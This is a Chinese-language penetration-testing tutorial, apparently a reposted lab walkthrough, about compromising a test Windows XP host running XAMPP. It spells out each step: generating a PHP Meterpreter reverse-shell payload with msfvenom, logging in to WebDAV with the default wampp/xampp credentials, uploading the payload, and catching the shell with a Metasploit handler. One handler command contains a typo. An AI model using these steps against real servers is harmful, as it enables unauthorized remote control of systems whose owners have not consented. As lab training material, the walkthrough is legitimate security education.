您的位置 首页 php

使用WebDav默认口令上传php远控,不用双击运行也能拿到shell

用于网络安全 渗透测试 ,禁止用于不当目的!

测试环境

之前我们搭建的测试靶机xp,已经内置了XAMPP web服务器组件。

在这个XAMPP组件中,大家可以看到安装有phpMyAdmin软件,它是一个网页版的数据库管理平台,显然我们可以看到xp安装了 apache 服务,支持web形式的访问和数据支持,另外还有php组件,说明只要通过任何浏览器访问xp的 web服务 页面地址路径(通常指定一个php后缀的文件),就能打开php的文件。

攻击思路:

既然xp安装了xampp,等同于可以运行php后缀的文件,我们只要通过一些技术手段上传一个php载荷小马即可,这种php载荷是不用在目标靶机进行运行的,我们只需要在本地kali进行远程触发即可(因为php或者 jsp 类型的文件本来就是放在 web服务器 根目录中让他人通过浏览器进行访问读取的!懂?)

注意:xp靶机的xampp必须开启!

实战测试

  • 生成windows平台php远控

kali终端下输入:

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.251 LPORT=8888 -f raw > xiaobai.php  

  • 发送远控

这里我们需要上传xiaobai.php小马到我们的xp服务器(xampp)中。

那如何实现上传呢?

其实在xp上安装的这个xampp存在WebDAV服务器程序,而且这个版本xampp的WebDAV口令都是默认的(一般不会更改)(一般web扫描软件并不会发现)

WebDAV是一个分布式文件管理服务器,用于上下传文件使用的。我们可以使用kali自带的客户端Cadaver程序来进行连接。

Kali终端下输入:

 cadaver  

默认的用户名是:wampp,密码是xampp!

如图:你发现已经成功进行了连接,而且还能使用ls命令查看当前webdav目录下的文件,甚至可以删除、上传、下载!这就是我们的一个突破口!

在webdav的当前终端下输入:

  

即可显示所有支持的命令!我们这里选择put命令,上传kali的php小马上去!

输入:

 put xiaobai.php  

你会发现已经成功上传我们的php载荷到xp的webdav服务器中了,你可以使用ls再次查看!

  • 设置msf监听

Kali终端下输入:

 msfconsole,启动metasploit  

设置相关侦听模块和载荷以及参数

 use multi/handler
set payload php/meterpreter/reverse_tcp
set LHOSTS 192.168.31.251
set LPORT 8888
run  

提示:这里的meterpreter会话有时候不一定会建立成功,但是这种攻击方法,你一定要会,在web渗透中,这就是常用的伎俩。

关注小白嘿客,学习完整的web渗透,可以点击 进入我的嘿客专栏获得永久学习哦!

欢迎点赞、评论、转发!

文章来源:智云一二三科技

文章标题:使用WebDav默认口令上传php远控,不用双击运行也能拿到shell

文章地址:https://www.zhihuclub.com/78522.shtml

关于作者: 智云科技

热门文章

网站地图